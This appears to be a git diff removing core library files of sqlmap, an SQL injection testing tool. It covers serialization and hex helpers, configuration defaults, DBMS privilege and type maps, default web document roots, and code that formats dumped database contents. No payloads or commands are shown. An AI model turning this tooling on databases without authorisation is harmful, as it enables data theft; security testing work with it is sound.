exec(code, variables) - except KeyboardInterrupt: - raise - except Exception, ex: - errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) - raise SqlmapGenericException(errMsg) - -def serializeObject(object_): - """ - Serializes given object - """ - - return base64pickle(object_) - -def unserializeObject(value): - """ - Unserializes object from given serialized form - - >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] - True - """ - - return base64unpickle(value) if value else None - -def resetCounter(technique): - """ - Resets query counter for a given technique - """ - - kb.counters[technique] = 0 - -def incrementCounter(technique): - """ - Increments query counter for a given technique - """ - - kb.counters[technique] = getCounter(technique) + 1 - -def getCounter(technique): - """ - Returns query counter for a given technique - """ - - return kb.counters.get(technique, 0) - -def applyFunctionRecursively(value, function): - """ - Applies function recursively through list-like structures - - >>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0) - [True, True, [True, True, [True]], False] - """ - - if isListLike(value): - retVal = [applyFunctionRecursively(_, function) for _ in value] - else: - retVal = function(value) - - return retVal - -def decodeHexValue(value, raw=False): - """ - Returns value decoded from DBMS specific hexadecimal representation - - >>> decodeHexValue('3132332031') - u'123 1' - """ - - retVal = value - - def _(value): - retVal = value - if value and isinstance(value, basestring): - if len(value) % 2 != 0: - retVal = "%s?" % hexdecode(value[:-1]) - singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) - else: - retVal = hexdecode(value) - - if not kb.binaryField and not raw: - if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): - try: - retVal = retVal.decode("utf-16-le") - except UnicodeDecodeError: - pass - elif Backend.isDbms(DBMS.HSQLDB): - try: - retVal = retVal.decode("utf-16-be") - except UnicodeDecodeError: - pass - if not isinstance(retVal, unicode): - retVal = getUnicode(retVal, "utf8") - - return retVal - - try: - retVal = applyFunctionRecursively(value, _) - except: - singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) - - return retVal - -def extractExpectedValue(value, expected): - """ - Extracts and returns expected value by a given type - - >>> extractExpectedValue(['1'], EXPECTED.BOOL) - True - >>> extractExpectedValue('1', EXPECTED.INT) - 1 - """ - - if expected: - value = unArrayizeValue(value) - - if isNoneValue(value): - value = None - elif expected == EXPECTED.BOOL: - if isinstance(value, int): - value = bool(value) - elif isinstance(value, basestring): - value = value.strip().lower() - if value in ("true", "false"): - value = value == "true" - elif value in ("1", "-1"): - value = True - elif value == "0": - value = False - else: - value = None - elif expected == EXPECTED.INT: - if isinstance(value, basestring): - value = int(value) if value.isdigit() else None - - return value - -def hashDBWrite(key, value, serialize=False): - """ - Helper function for writing session data to HashDB - """ - - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - conf.hashDB.write(_, value, serialize) - -def hashDBRetrieve(key, unserialize=False, checkConf=False): - """ - Helper function for restoring session data from HashDB - """ - - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None - if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): - retVal = None - return retVal - -def resetCookieJar(cookieJar): - """ - Cleans cookies from a given cookie jar - """ - - if not conf.loadCookies: - cookieJar.clear() - else: - try: - if not cookieJar.filename: - infoMsg = "loading cookies from '%s'" % conf.loadCookies - logger.info(infoMsg) - - content = readCachedFileContent(conf.loadCookies) - lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#'))) - handle, filename = tempfile.mkstemp(prefix="sqlmapcj-") - os.close(handle) - - # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html - with openFile(filename, "w+b") as f: - f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) - for line in lines: - _ = line.split("\t") - if len(_) == 7: - _[4] = FORCE_COOKIE_EXPIRATION_TIME - f.write("\n%s" % "\t".join(_)) - - cookieJar.filename = filename - - cookieJar.load(cookieJar.filename, ignore_expires=True) - - for cookie in cookieJar: - if cookie.expires < time.time(): - warnMsg = "cookie '%s' has expired" % cookie - singleTimeWarnMessage(warnMsg) - - cookieJar.clear_expired_cookies() - - if not cookieJar._cookies: - errMsg = "no valid cookies found" - raise SqlmapGenericException(errMsg) - - except cookielib.LoadError, msg: - errMsg = "there was a problem loading " - errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", "\g<1>", str(msg)) - raise SqlmapGenericException(errMsg) - -def decloakToTemp(filename): - """ - Decloaks content of a given file to a temporary file with similar name and extension - """ - - content = decloak(filename) - - _ = utf8encode(os.path.split(filename[:-1])[-1]) - - prefix, suffix = os.path.splitext(_) - prefix = prefix.split(os.extsep)[0] - - handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) - os.close(handle) - - with open(filename, "w+b") as f: - f.write(content) - - return filename - -def prioritySortColumns(columns): - """ - Sorts given column names by length in ascending order while those containing - string 'id' go first - - >>> prioritySortColumns(['password', 'userid', 'name']) - ['userid', 'name', 'password'] - """ - - _ = lambda x: x and "id" in x.lower() - return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0) - -def getRequestHeader(request, name): - """ - Solving an issue with an urllib2 Request header case sensitivity - - Reference: http://bugs.python.org/issue2275 - """ - - retVal = None - if request and name: - retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items()) - return retVal - -def isNumber(value): - """ - Returns True if the given value is a number-like object - - >>> isNumber(1) - True - >>> isNumber('0') - True - >>> isNumber('foobar') - False - """ - - try: - float(value) - except: - return False - else: - return True - -def zeroDepthSearch(expression, value): - """ - Searches occurrences of value inside expression at 0-depth level - regarding the parentheses - """ - - retVal = [] - - depth = 0 - for index in xrange(len(expression)): - if expression[index] == '(': - depth += 1 - elif expression[index] == ')': - depth -= 1 - elif depth == 0 and expression[index:index + len(value)] == value: - retVal.append(index) - - return retVal - -def splitFields(fields, delimiter=','): - """ - Returns list of (0-depth) fields splitted by delimiter - - >>> splitFields('foo, bar, max(foo, bar)') - ['foo', 'bar', 'max(foo,bar)'] - """ - - fields = fields.replace("%s " % delimiter, delimiter) - commas = [-1, len(fields)] - commas.extend(zeroDepthSearch(fields, ',')) - commas = sorted(commas) - - return [fields[x + 1:y] for (x, y) in zip(commas, commas[1:])] - -def pollProcess(process, suppress_errors=False): - """ - Checks for process status (prints . if still running) - """ - - while True: - dataToStdout(".") - time.sleep(1) - - returncode = process.poll() - - if returncode is not None: - if not suppress_errors: - if returncode == 0: - dataToStdout(" done\n") - elif returncode < 0: - dataToStdout(" process terminated by signal %d\n" % returncode) - elif returncode > 0: - dataToStdout(" quit unexpectedly with return code %d\n" % returncode) - - break - -def getSafeExString(ex, encoding=None): - """ - Safe way how to get the proper exception represtation as a string - (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) - """ - - retVal = ex - - if getattr(ex, "message", None): - retVal = ex.message - elif getattr(ex, "msg", None): - retVal = ex.msg - - return getUnicode(retVal, encoding=encoding) diff --git a/lib/core/convert.py b/lib/core/convert.py deleted file mode 100644 index dbcbb233..00000000 --- a/lib/core/convert.py +++ /dev/null @@ -1,220 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import base64 -import json -import pickle -import re -import StringIO -import sys -import types - -from lib.core.settings import IS_WIN -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import PICKLE_REDUCE_WHITELIST - -def base64decode(value): - """ - Decodes string value from Base64 to plain format - - >>> base64decode('Zm9vYmFy') - 'foobar' - """ - - return base64.b64decode(value) - -def base64encode(value): - """ - Encodes string value from plain to Base64 format - - >>> base64encode('foobar') - 'Zm9vYmFy' - """ - - return base64.b64encode(value) - -def base64pickle(value): - """ - Serializes (with pickle) and encodes to Base64 format supplied (binary) value - - >>> base64pickle('foobar') - 'gAJVBmZvb2JhcnEALg==' - """ - - retVal = None - - try: - retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL)) - except: - warnMsg = "problem occurred while serializing " - warnMsg += "instance of a type '%s'" % type(value) - singleTimeWarnMessage(warnMsg) - - try: - retVal = base64encode(pickle.dumps(value)) - except: - retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL)) - - return retVal - -def base64unpickle(value): - """ - Decodes value from Base64 to plain format and deserializes (with pickle) its content - - >>> base64unpickle('gAJVBmZvb2JhcnEALg==') - 'foobar' - """ - - retVal = None - - def _(self): - if len(self.stack) > 1: - func = self.stack[-2] - if func not in PICKLE_REDUCE_WHITELIST: - raise Exception, "abusing reduce() is bad, Mkay!" - self.load_reduce() - - def loads(str): - file = StringIO.StringIO(str) - unpickler = pickle.Unpickler(file) - unpickler.dispatch[pickle.REDUCE] = _ - return unpickler.load() - - try: - retVal = loads(base64decode(value)) - except TypeError: - retVal = loads(base64decode(bytes(value))) - - return retVal - -def hexdecode(value): - """ - Decodes string value from hex to plain format - - >>> hexdecode('666f6f626172') - 'foobar' - """ - - value = value.lower() - return (value[2:] if value.startswith("0x") else value).decode("hex") - -def hexencode(value): - """ - Encodes string value from plain to hex format - - >>> hexencode('foobar') - '666f6f626172' - """ - - return utf8encode(value).encode("hex") - -def unicodeencode(value, encoding=None): - """ - Returns 8-bit string representation of the supplied unicode value - - >>> unicodeencode(u'foobar') - 'foobar' - """ - - retVal = value - if isinstance(value, unicode): - try: - retVal = value.encode(encoding or UNICODE_ENCODING) - except UnicodeEncodeError: - retVal = value.encode(UNICODE_ENCODING, "replace") - return retVal - -def utf8encode(value): - """ - Returns 8-bit string representation of the supplied UTF-8 value - - >>> utf8encode(u'foobar') - 'foobar' - """ - - return unicodeencode(value, "utf-8") - -def utf8decode(value): - """ - Returns UTF-8 representation of the supplied 8-bit string representation - - >>> utf8decode('foobar') - u'foobar' - """ - - return value.decode("utf-8") - -def htmlunescape(value): - """ - Returns (basic conversion) HTML unescaped value - - >>> htmlunescape('a<b') - 'a'), ('"', '"'), (' ', ' '), ('&', '&')) - retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal) - try: - retVal = re.sub(r"&#x([^;]+);", lambda match: unichr(int(match.group(1), 16)), retVal) - except ValueError: - pass - return retVal - -def singleTimeWarnMessage(message): # Cross-linked function - sys.stdout.write(message) - sys.stdout.write("\n") - sys.stdout.flush() - -def stdoutencode(data): - retVal = None - - try: - data = data or "" - - # Reference: http://bugs.python.org/issue1602 - if IS_WIN: - output = data.encode(sys.stdout.encoding, "replace") - - if '?' in output and '?' not in data: - warnMsg = "cannot properly display Unicode characters " - warnMsg += "inside Windows OS command prompt " - warnMsg += "(http://bugs.python.org/issue1602). All " - warnMsg += "unhandled occurances will result in " - warnMsg += "replacement with '?' character. Please, find " - warnMsg += "proper character representation inside " - warnMsg += "corresponding output files. " - singleTimeWarnMessage(warnMsg) - - retVal = output - else: - retVal = data.encode(sys.stdout.encoding) - except: - retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data - - return retVal - -def jsonize(data): - """ - Returns JSON serialized data - - >>> jsonize({'foo':'bar'}) - '{\\n "foo": "bar"\\n}' - """ - - return json.dumps(data, sort_keys=False, indent=4) - -def dejsonize(data): - """ - Returns JSON deserialized data - - >>> dejsonize('{\\n "foo": "bar"\\n}') - {u'foo': u'bar'} - """ - - return json.loads(data) diff --git a/lib/core/data.py b/lib/core/data.py deleted file mode 100644 index 6197d6b7..00000000 --- a/lib/core/data.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.datatype import AttribDict -from lib.core.log import LOGGER - -# sqlmap paths -paths = AttribDict() - -# object to store original command line options -cmdLineOptions = AttribDict() - -# object to store merged options (command line, configuration file and default options) -mergedOptions = AttribDict() - -# object to share within function and classes command -# line options and settings -conf = AttribDict() - -# object to share within function and classes results -kb = AttribDict() - -# object with each database management system specific queries -queries = {} - -# logger -logger = LOGGER diff --git a/lib/core/datatype.py b/lib/core/datatype.py deleted file mode 100644 index 182abe31..00000000 --- a/lib/core/datatype.py +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import copy -import types - -from lib.core.exception import SqlmapDataException - -class AttribDict(dict): - """ - This class defines the sqlmap object, inheriting from Python data - type dictionary. - - >>> foo = AttribDict() - >>> foo.bar = 1 - >>> foo.bar - 1 - """ - - def __init__(self, indict=None, attribute=None): - if indict is None: - indict = {} - - # Set any attributes here - before initialisation - # these remain as normal attributes - self.attribute = attribute - dict.__init__(self, indict) - self.__initialised = True - - # After initialisation, setting attributes - # is the same as setting an item - - def __getattr__(self, item): - """ - Maps values to attributes - Only called if there *is NOT* an attribute with this name - """ - - try: - return self.__getitem__(item) - except KeyError: - raise SqlmapDataException("unable to access item '%s'" % item) - - def __setattr__(self, item, value): - """ - Maps attributes to values - Only if we are initialised - """ - - # This test allows attributes to be set in the __init__ method - if "_AttribDict__initialised" not in self.__dict__: - return dict.__setattr__(self, item, value) - - # Any normal attributes are handled normally - elif item in self.__dict__: - dict.__setattr__(self, item, value) - - else: - self.__setitem__(item, value) - - def __getstate__(self): - return self.__dict__ - - def __setstate__(self, dict): - self.__dict__ = dict - - def __deepcopy__(self, memo): - retVal = self.__class__() - memo[id(self)] = retVal - - for attr in dir(self): - if not attr.startswith('_'): - value = getattr(self, attr) - if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): - setattr(retVal, attr, copy.deepcopy(value, memo)) - - for key, value in self.items(): - retVal.__setitem__(key, copy.deepcopy(value, memo)) - - return retVal - -class InjectionDict(AttribDict): - def __init__(self): - AttribDict.__init__(self) - - self.place = None - self.parameter = None - self.ptype = None - self.prefix = None - self.suffix = None - self.clause = None - - # data is a dict with various stype, each which is a dict with - # all the information specific for that stype - self.data = AttribDict() - - # conf is a dict which stores current snapshot of important - # options used during detection - self.conf = AttribDict() - - self.dbms = None - self.dbms_version = None - self.os = None diff --git a/lib/core/decorators.py b/lib/core/decorators.py deleted file mode 100644 index 93019ad8..00000000 --- a/lib/core/decorators.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -def cachedmethod(f, cache={}): - """ - Method with a cached content - - Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ - """ - - def _(*args, **kwargs): - try: - key = (f, tuple(args), frozenset(kwargs.items())) - except: - key = "".join(str(_) for _ in (f, args, kwargs)) - if key not in cache: - cache[key] = f(*args, **kwargs) - return cache[key] - - return _ diff --git a/lib/core/defaults.py b/lib/core/defaults.py deleted file mode 100644 index 99674aa1..00000000 --- a/lib/core/defaults.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.datatype import AttribDict - -_defaults = { - "csvDel": ",", - "timeSec": 5, - "googlePage": 1, - "cpuThrottle": 5, - "verbose": 1, - "delay": 0, - "timeout": 30, - "retries": 3, - "saFreq": 0, - "threads": 1, - "level": 1, - "risk": 1, - "dumpFormat": "CSV", - "tech": "BEUSTQ", - "torType": "HTTP", -} - -defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py deleted file mode 100644 index b896ed81..00000000 --- a/lib/core/dicts.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.enums import POST_HINT -from lib.core.settings import BLANK -from lib.core.settings import NULL -from lib.core.settings import MSSQL_ALIASES -from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import PGSQL_ALIASES -from lib.core.settings import ORACLE_ALIASES -from lib.core.settings import SQLITE_ALIASES -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import MAXDB_ALIASES -from lib.core.settings import SYBASE_ALIASES -from lib.core.settings import DB2_ALIASES -from lib.core.settings import HSQLDB_ALIASES - -FIREBIRD_TYPES = { - 261: "BLOB", - 14: "CHAR", - 40: "CSTRING", - 11: "D_FLOAT", - 27: "DOUBLE", - 10: "FLOAT", - 16: "INT64", - 8: "INTEGER", - 9: "QUAD", - 7: "SMALLINT", - 12: "DATE", - 13: "TIME", - 35: "TIMESTAMP", - 37: "VARCHAR", - } - -SYBASE_TYPES = { - 14: "floatn", - 8: "float", - 15: "datetimn", - 12: "datetime", - 23: "real", - 28: "numericn", - 10: "numeric", - 27: "decimaln", - 26: "decimal", - 17: "moneyn", - 11: "money", - 21: "smallmoney", - 22: "smalldatetime", - 13: "intn", - 7: "int", - 6: "smallint", - 5: "tinyint", - 16: "bit", - 2: "varchar", - 18: "sysname", - 25: "nvarchar", - 1: "char", - 24: "nchar", - 4: "varbinary", - 80: "timestamp", - 3: "binary", - 19: "text", - 20: "image", - } - -MYSQL_PRIVS = { - 1: "select_priv", - 2: "insert_priv", - 3: "update_priv", - 4: "delete_priv", - 5: "create_priv", - 6: "drop_priv", - 7: "reload_priv", - 8: "shutdown_priv", - 9: "process_priv", - 10: "file_priv", - 11: "grant_priv", - 12: "references_priv", - 13: "index_priv", - 14: "alter_priv", - 15: "show_db_priv", - 16: "super_priv", - 17: "create_tmp_table_priv", - 18: "lock_tables_priv", - 19: "execute_priv", - 20: "repl_slave_priv", - 21: "repl_client_priv", - 22: "create_view_priv", - 23: "show_view_priv", - 24: "create_routine_priv", - 25: "alter_routine_priv", - 26: "create_user_priv", - } - -PGSQL_PRIVS = { - 1: "createdb", - 2: "super", - 3: "catupd", - } - -# Reference(s): http://stackoverflow.com/a/17672504 -# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES - -FIREBIRD_PRIVS = { - "S": "SELECT", - "I": "INSERT", - "U": "UPDATE", - "D": "DELETE", - "R": "REFERENCE", - "E": "EXECUTE", - "X": "EXECUTE", - "A": "ALL", - "M": "MEMBER", - "T": "DECRYPT", - "E": "ENCRYPT", - "B": "SUBSCRIBE", - } - -DB2_PRIVS = { - 1: "CONTROLAUTH", - 2: "ALTERAUTH", - 3: "DELETEAUTH", - 4: "INDEXAUTH", - 5: "INSERTAUTH", - 6: "REFAUTH", - 7: "SELECTAUTH", - 8: "UPDATEAUTH", - } - -DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} - -DBMS_DICT = { - DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"), - DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"), - DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), - DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"), - DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"), - DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"), - DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), - DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), - DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"), - DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"), - DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), - } - -FROM_DUMMY_TABLE = { - DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects", - DBMS.FIREBIRD: " FROM RDB$DATABASE", - DBMS.MAXDB: " FROM VERSIONS", - DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", - DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS" - } - -SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), - - "SQL data definition": ( - "create ", - "declare ", - "drop ", - "truncate ", - "alter ", ), - - "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), - - "SQL data control": ( - "grant ", - "revoke ", ), - - "SQL data execution": ( - "exec ", - "execute ", - "values ", - "call ", ), - - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), - } - -POST_HINT_CONTENT_TYPES = { - POST_HINT.JSON: "application/json", - POST_HINT.JSON_LIKE: "application/json", - POST_HINT.MULTIPART: "multipart/form-data", - POST_HINT.SOAP: "application/soap+xml", - POST_HINT.XML: "application/xml", - POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", - } - -DEPRECATED_OPTIONS = { - "--replicate": "use '--dump-format=SQLITE' instead", - "--no-unescape": "use '--no-escape' instead", - "--binary": "use '--binary-fields' instead", - "--auth-private": "use '--auth-file' instead", - "--check-payload": None, - "--check-waf": None, - } - -DUMP_DATA_PREPROCESS = { - DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 - DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, - } - -DEFAULT_DOC_ROOTS = { - OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"), - OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout - } diff --git a/lib/core/dump.py b/lib/core/dump.py deleted file mode 100644 index e56defdd..00000000 --- a/lib/core/dump.py +++ /dev/null @@ -1,690 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cgi -import hashlib -import os -import re -import tempfile -import threading - -from lib.core.common import Backend -from lib.core.common import dataToDumpFile -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import isListLike -from lib.core.common import normalizeUnicode -from lib.core.common import openFile -from lib.core.common import prioritySortColumns -from lib.core.common import randomInt -from lib.core.common import safeCSValue -from lib.core.common import unicodeencode -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import CONTENT_STATUS -from lib.core.enums import CONTENT_TYPE -from lib.core.enums import DBMS -from lib.core.enums import DUMP_FORMAT -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapValueException -from lib.core.exception import SqlmapSystemException -from lib.core.replication import Replication -from lib.core.settings import DUMP_FILE_BUFFER_SIZE -from lib.core.settings import HTML_DUMP_CSS_STYLE -from lib.core.settings import IS_WIN -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE -from lib.core.settings import TRIM_STDOUT_DUMP_SIZE -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import WINDOWS_RESERVED_NAMES -from thirdparty.magic import magic - -from extra.safe2bin.safe2bin import safechardecode - -class Dump(object): - """ - This class defines methods used to parse and output the results - of SQL injection actions - """ - - def __init__(self): - self._outputFile = None - self._outputFP = None - self._lock = threading.Lock() - - def _write(self, data, newline=True, console=True, content_type=None): - if hasattr(conf, "api"): - dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE) - return - - text = "%s%s" % (data, "\n" if newline else " ") - - if console: - dataToStdout(text) - - if kb.get("multiThreadMode"): - self._lock.acquire() - - try: - self._outputFP.write(text) - except IOError, ex: - errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) - raise SqlmapGenericException(errMsg) - - if kb.get("multiThreadMode"): - self._lock.release() - - kb.dataOutputFlag = True - - def flush(self): - if self._outputFP: - try: - self._outputFP.flush() - except IOError: - pass - - def setOutputFile(self): - self._outputFile = os.path.join(conf.outputPath, "log") - try: - self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") - except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) - raise SqlmapGenericException(errMsg) - - def getOutputFile(self): - return self._outputFile - - def singleString(self, data, content_type=None): - self._write(data, content_type=content_type) - - def string(self, header, data, content_type=None, sort=True): - kb.stickyLevel = None - - if hasattr(conf, "api"): - self._write(data, content_type=content_type) - return - - if isListLike(data): - self.lister(header, data, content_type, sort) - elif data is not None: - _ = getUnicode(data) - - if _ and _[-1] == '\n': - _ = _[:-1] - - if "\n" in _: - self._write("%s:\n---\n%s\n---" % (header, _)) - else: - self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, basestring) else _)) - else: - self._write("%s:\tNone" % header) - - def lister(self, header, elements, content_type=None, sort=True): - if elements and sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - except: - pass - - if hasattr(conf, "api"): - self._write(elements, content_type=content_type) - return - - if elements: - self._write("%s [%d]:" % (header, len(elements))) - - for element in elements: - if isinstance(element, basestring): - self._write("[*] %s" % element) - elif isListLike(element): - self._write("[*] " + ", ".join(getUnicode(e) for e in element)) - - if elements: - self._write("") - - def banner(self, data): - self.string("banner", data, content_type=CONTENT_TYPE.BANNER) - - def currentUser(self, data): - self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER) - - def currentDb(self, data): - if Backend.isDbms(DBMS.MAXDB): - self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): - self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - else: - self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) - - def hostname(self, data): - self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME) - - def dba(self, data): - self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA) - - def users(self, users): - self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS) - - def userSettings(self, header, userSettings, subHeader, content_type=None): - self._areAdmins = set() - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - - if hasattr(conf, "api"): - self._write(userSettings, content_type=content_type) - return - - if userSettings: - self._write("%s:" % header) - - for user in users: - settings = userSettings[user] - - if settings is None: - stringSettings = "" - else: - stringSettings = " [%d]:" % len(settings) - - if user in self._areAdmins: - self._write("[*] %s (administrator)%s" % (user, stringSettings)) - else: - self._write("[*] %s%s" % (user, stringSettings)) - - if settings: - settings.sort() - - for setting in settings: - self._write(" %s: %s" % (subHeader, setting)) - - if userSettings: - self.singleString("") - - def dbs(self, dbs): - self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS) - - def dbTables(self, dbTables): - if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): - self._write(dbTables, content_type=CONTENT_TYPE.TABLES) - return - - maxlength = 0 - - for tables in dbTables.values(): - for table in tables: - if table and isListLike(table): - table = table[0] - - maxlength = max(maxlength, len(unsafeSQLIdentificatorNaming(normalizeUnicode(table) or unicode(table)))) - - lines = "-" * (int(maxlength) + 2) - - for db, tables in dbTables.items(): - tables.sort() - - self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database") - - if len(tables) == 1: - self._write("[1 table]") - else: - self._write("[%d tables]" % len(tables)) - - self._write("+%s+" % lines) - - for table in tables: - if table and isListLike(table): - table = table[0] - - table = unsafeSQLIdentificatorNaming(table) - blank = " " * (maxlength - len(normalizeUnicode(table) or unicode(table))) - self._write("| %s%s |" % (table, blank)) - - self._write("+%s+\n" % lines) - elif dbTables is None or len(dbTables) == 0: - self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES) - else: - self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES) - - def dbTableColumns(self, tableColumns, content_type=None): - if isinstance(tableColumns, dict) and len(tableColumns) > 0: - if hasattr(conf, "api"): - self._write(tableColumns, content_type=content_type) - return - - for db, tables in tableColumns.items(): - if not db: - db = "All" - - for table, columns in tables.items(): - maxlength1 = 0 - maxlength2 = 0 - - colType = None - - colList = columns.keys() - colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - - for column in colList: - colType = columns[column] - - column = unsafeSQLIdentificatorNaming(column) - maxlength1 = max(maxlength1, len(column or "")) - maxlength2 = max(maxlength2, len(colType or "")) - - maxlength1 = max(maxlength1, len("COLUMN")) 